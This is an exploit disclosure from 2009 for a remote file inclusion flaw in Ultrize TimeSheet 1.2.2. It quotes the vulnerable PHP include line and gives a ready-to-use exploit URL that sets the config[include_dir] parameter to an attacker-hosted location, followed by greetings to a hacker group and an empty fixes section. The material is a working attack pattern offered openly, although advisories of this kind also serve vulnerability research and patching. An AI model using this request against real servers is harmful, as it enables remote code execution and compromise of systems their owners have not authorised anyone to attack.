Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

2009-07-28 22:33:31

=====================================================================================


[o]

Software : Ultrize TimeSheet version 1.2.2
Vendor : http://www.ultrize.com/
Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com


=====================================================================================


[o] Vulnerable file


include($config['include_dir'].'timesheet.class.php');

include/timesheet.php



[o] Exploit

http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]


=====================================================================================


[o] Greetz

MainHack BrotherHood [ http://mainhack.net ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


=====================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.